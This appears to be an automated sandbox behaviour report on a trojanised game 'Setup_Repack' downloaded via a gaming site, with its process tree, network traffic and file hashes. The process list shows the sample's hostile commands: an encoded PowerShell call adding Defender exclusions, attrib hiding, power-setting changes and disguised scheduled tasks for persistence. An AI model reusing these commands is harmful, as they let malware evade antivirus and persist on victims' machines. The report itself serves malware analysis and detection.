PID 4340 wrote to memory of 1396 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 1396 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 1396 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 1396 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 1396 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 1396 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 1396 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 1396 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 1396 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 1396 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 1396 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 1396 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 1396 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 1396 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 1396 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 2024 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 2024 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 2024 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 2024 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 2024 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 2024 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 2024 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 2024 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 2024 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 2024 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 2024 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 2024 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 2024 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 2024 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 2024 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 752 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 752 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 752 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 752 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 2024 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 752 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 752 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 752 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 752 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 752 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 752 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 2024 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 2024 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 2024 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 2024 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 2024 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4060 wrote to memory of 356 N/A C:\Users\Admin\Desktop\Setup_Repack\Setup_Repack\Setup.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe
PID 4060 wrote to memory of 356 N/A C:\Users\Admin\Desktop\Setup_Repack\Setup_Repack\Setup.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe
PID 4060 wrote to memory of 2204 N/A C:\Users\Admin\Desktop\Setup_Repack\Setup_Repack\Setup.exe C:\Users\Admin\AppData\Local\Temp\conhost.exe
PID 4060 wrote to memory of 2204 N/A C:\Users\Admin\Desktop\Setup_Repack\Setup_Repack\Setup.exe C:\Users\Admin\AppData\Local\Temp\conhost.exe
PID 4060 wrote to memory of 2204 N/A C:\Users\Admin\Desktop\Setup_Repack\Setup_Repack\Setup.exe C:\Users\Admin\AppData\Local\Temp\conhost.exe
PID 2204 wrote to memory of 3728 N/A C:\Users\Admin\AppData\Local\Temp\conhost.exe C:\Windows\system32\cmd.exe
PID 2204 wrote to memory of 3728 N/A C:\Users\Admin\AppData\Local\Temp\conhost.exe C:\Windows\system32\cmd.exe
PID 3728 wrote to memory of 4464 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mode.com
PID 3728 wrote to memory of 4464 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mode.com
PID 3728 wrote to memory of 8 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Windows\system32\LaunchWinApp.exe

"C:\Windows\system32\LaunchWinApp.exe" "https://feel-easy.games/catalog/counter-strike-go/"

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca

C:\Windows\system32\browser_broker.exe

C:\Windows\system32\browser_broker.exe -Embedding

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\system32\werfault.exe

werfault.exe /h /shared Global\8e2e508d1cdf4962b651ae1c84f59cf3 /t 0 /p 1396

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TempState\Downloads\Setup_Repack\" -ad -an -ai#7zMap2531:228:7zEvent11327

C:\Users\Admin\Desktop\Setup_Repack\Setup_Repack\Setup.exe

"C:\Users\Admin\Desktop\Setup_Repack\Setup_Repack\Setup.exe"

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\Setup_Repack\Setup_Repack\read me.txt

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /4

C:\Users\Admin\AppData\Local\Temp\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\svchost.exe"

C:\Users\Admin\AppData\Local\Temp\conhost.exe

"C:\Users\Admin\AppData\Local\Temp\conhost.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"

C:\Windows\system32\mode.com

mode 65,10

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e file.zip -p1432210452150682449214609890 -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_8.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_7.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_6.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_5.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_4.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_3.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_2.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_1.zip -oextracted

C:\Windows\system32\attrib.exe

attrib +H "Installer.exe"

C:\Users\Admin\AppData\Local\Temp\main\Installer.exe

"Installer.exe"

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C powershell -EncodedCommand "PAAjADMATAAxAEMAaAB4ADUATAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUATwA4AFIAdwBXAEwARQAyAEMAUgAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBqAHQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbQA1ADAAIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -EncodedCommand "PAAjADMATAAxAEMAaAB4ADUATAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUATwA4AFIAdwBXAEwARQAyAEMAUgAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBqAHQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbQA1ADAAIwA+AA=="

C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe

C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe

C:\Windows\SysWOW64\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\SysWOW64\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\SysWOW64\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\SysWOW64\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\SysWOW64\powercfg.exe

powercfg /hibernate off

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk4901" /TR "C:\ProgramData\Dllhost\dllhost.exe"

C:\Windows\SysWOW64\schtasks.exe

SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk4901" /TR "C:\ProgramData\Dllhost\dllhost.exe"

C:\Windows\SysWOW64\schtasks.exe

SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 feel-easy.games udp
RU 185.105.110.5:443 feel-easy.games tcp
RU 185.105.110.5:443 feel-easy.games tcp
US 8.8.8.8:53 5.110.105.185.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 142.33.222.23.in-addr.arpa udp
US 8.8.8.8:53 162.25.221.88.in-addr.arpa udp
RU 185.105.110.5:443 feel-easy.games tcp
RU 185.105.110.5:443 feel-easy.games tcp
US 8.8.8.8:53 www.mediafire.com udp
US 104.16.53.48:443 www.mediafire.com tcp
US 104.16.53.48:443 www.mediafire.com tcp
US 8.8.8.8:53 the.gatekeeperconsent.com udp
US 8.8.8.8:53 btloader.com udp
US 8.8.8.8:53 www.ezojs.com udp
US 8.8.8.8:53 translate.google.com udp
US 172.67.144.62:443 the.gatekeeperconsent.com tcp
US 172.67.144.62:443 the.gatekeeperconsent.com tcp
NL 142.250.179.206:443 translate.google.com tcp
NL 142.250.179.206:443 translate.google.com tcp
US 172.67.201.96:443 www.ezojs.com tcp
US 172.67.201.96:443 www.ezojs.com tcp
US 172.67.70.134:443 btloader.com tcp
US 172.67.70.134:443 btloader.com tcp
US 8.8.8.8:53 static.cloudflareinsights.com udp
US 104.16.56.101:443 static.cloudflareinsights.com tcp
US 104.16.56.101:443 static.cloudflareinsights.com tcp
US 8.8.8.8:53 48.53.16.104.in-addr.arpa udp
US 8.8.8.8:53 101.14.18.104.in-addr.arpa udp
US 8.8.8.8:53 200.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 96.201.67.172.in-addr.arpa udp
US 8.8.8.8:53 62.144.67.172.in-addr.arpa udp
US 8.8.8.8:53 134.70.67.172.in-addr.arpa udp
US 8.8.8.8:53 101.56.16.104.in-addr.arpa udp
US 8.8.8.8:53 privacy.gatekeeperconsent.com udp
US 8.8.8.8:53 cdn.amplitude.com udp
US 172.67.144.62:443 privacy.gatekeeperconsent.com tcp
US 172.67.144.62:443 privacy.gatekeeperconsent.com tcp
NL 108.156.61.101:443 cdn.amplitude.com tcp
NL 108.156.61.101:443 cdn.amplitude.com tcp
US 8.8.8.8:53 www.facebook.com udp
NL 157.240.247.35:443 www.facebook.com tcp
NL 157.240.247.35:443 www.facebook.com tcp
US 104.16.53.48:443 www.mediafire.com tcp
US 104.16.53.48:443 www.mediafire.com tcp
US 8.8.8.8:53 static.mediafire.com udp
US 104.16.54.48:443 static.mediafire.com tcp
US 104.16.54.48:443 static.mediafire.com tcp
US 104.16.54.48:443 static.mediafire.com tcp
US 104.16.54.48:443 static.mediafire.com tcp
US 104.16.54.48:443 static.mediafire.com tcp
US 104.16.54.48:443 static.mediafire.com tcp
US 8.8.8.8:53 35.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 101.61.156.108.in-addr.arpa udp
US 8.8.8.8:53 35.247.240.157.in-addr.arpa udp
US 8.8.8.8:53 115.61.156.108.in-addr.arpa udp
US 8.8.8.8:53 48.54.16.104.in-addr.arpa udp
US 8.8.8.8:53 230.137.222.52.in-addr.arpa udp
RU 185.105.110.5:443 feel-easy.games tcp
RU 185.105.110.5:443 feel-easy.games tcp

Files

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies\FRYWWAU3.cookie

MD5 c9c7f9c3be94b6a946cb007a3baba667
SHA1 5a7a72cc5908720b8ad1a6bae017b949864e809d
SHA256 29e3b72736536164360ea10ef185c65f06908df46f03b5897191fb82332c9995
SHA512 7d55c0e3cd8e6d248641f7cd18631b3814ac738be450273942a2ae5ba7d329a7bf2ac40039206434bf4b437f68bd9d76b9b8d966b43f0b7c2f7a860cb492e2ce

C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\User\Default\DOMStore\XR06EITC\www.mediafire[1].xml

MD5 f76915b203d934248fd9fef1e62d7343
SHA1 9bf6d529a3a8f1ed5f071da510ca78500f3e93ac
SHA256 e9d7398499eca6f370b9d227e87e328e9442e18f1fd14c1b63978afc20bc9f31
SHA512 83a98769a8ff914a3fb0aed027e6de1e304b2307ecc2468c3cf06e48558ad720c7955ee4d4d8b436142509f5dd279c149b5f8ee33eb12b7d08d9737888f377bb

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_0748E67E80AF362FA2122F9BE8E2128E

MD5 a6adbcfbd8d01453ada1b2f2dd2cb565
SHA1 04bd5a02619be93f2118d7c8581dc318a40fb1f0
SHA256 cf4c251c041e83b2dd0d899217d4765e7d8c80b531609e24704732dafbac1662
SHA512 6f88d41177712ec1b4bffbc807fb9d3718281c48eeeb3b926cc1bde7c49c53ee670abc78e670dacafa215c356bfe63f87f8705a3d1f44fb65a3a1cc08b5facb2

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_0748E67E80AF362FA2122F9BE8E2128E

MD5 3ae4f752c5d3b5ac028434016e7028d3
SHA1 28302402a5ee827cb08dfeb169562ce798fdc3bd
SHA256 088aaebc8b4420813017606cbe903f108d2afa50494e885ac1a93550054e0cbc
SHA512 e0bccc54ab9604936cf2408e544e43562d398b5ebf5767480e3579ef085a2fbfe4a031f1fc65c2736fb604fe213af9723399c2adfe28555e5c5641483a78db3f

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\LA8JCWVO\plus[1].svg

MD5 8b9af3a8b847d2b8123af385e2275b2e
SHA1 6b2fa67acab3701a9cb54cfba491e5c4bc5639db
SHA256 f54ba065e03174f3e4ab77706fda9812a50e6b00034cecb79c5d7ad45c1d91cc
SHA512 aeb65087065a7d989bbc6fdefc9cf38825fbd72708066e1e2095e7db38a0d0db387769ce685d353e04e3a8f42dd8b0c79fdb57d2a3706093056864f2f86f6049

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

MD5 f7dcb24540769805e5bb30d193944dce
SHA1 e26c583c562293356794937d9e2e6155d15449ee
SHA256 6b88c6ac55bbd6fea0ebe5a760d1ad2cfce251c59d0151a1400701cb927e36ea
SHA512 cb5ad678b0ef642bf492f32079fe77e8be20c02de267f04b545df346b25f3e4eb98bb568c4c2c483bb88f7d1826863cb515b570d620766e52476c8ee2931ea94

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\R7LFADWO\edgecompatviewlist[1].xml

MD5 d4fc49dc14f63895d997fa4940f24378
SHA1 3efb1437a7c5e46034147cbbc8db017c69d02c31
SHA256 853d2f4eb81c9fdcea2ee079f6faf98214b111b77cdf68709b38989d123890f1
SHA512 cc60d79b4afe5007634ac21dc4bc92081880be4c0d798a1735b63b27e936c02f399964f744dc73711987f01e8a1064b02a4867dd6cac27538e5fbe275cc61e0a

C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\492V7EW6\js[1].js

MD5 d87133ba3d487d9e3deb701da6beabfc
SHA1 067548a7efefd8df98e9b4182fea9c9af586a7eb
SHA256 1bcde8e10545ad8fcf5c975ff16fc9d67002a80b97e21893b5d4878b490ba448
SHA512 62764db5928e74adb65baeb90f42e1c8f6eaff4e1711453639ca9fc1a414b4f6fe7ea477721ece1aa04db1244b6913fba6fb5df39d37dcb523c857e7a4b39d28

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies\SFHKZTWF.cookie

MD5 d8a1da58617e36ab5b34ecae0f793fa7
SHA1 887668a15477027ab1f156c9d61f160591e765fb
SHA256 11e425dd3f44b92473b121e6cd5577a91ecc140879414a2994032c6e579e6a14
SHA512 8e54b4bcc40cc3e711d96d0736e3f4a99761c70c26181db788c7090f64bd543b47c1fc27b1db8390ed40b9d89a2e8b5f6b6087ec8a7c8ac2a5c02ee2c239929d

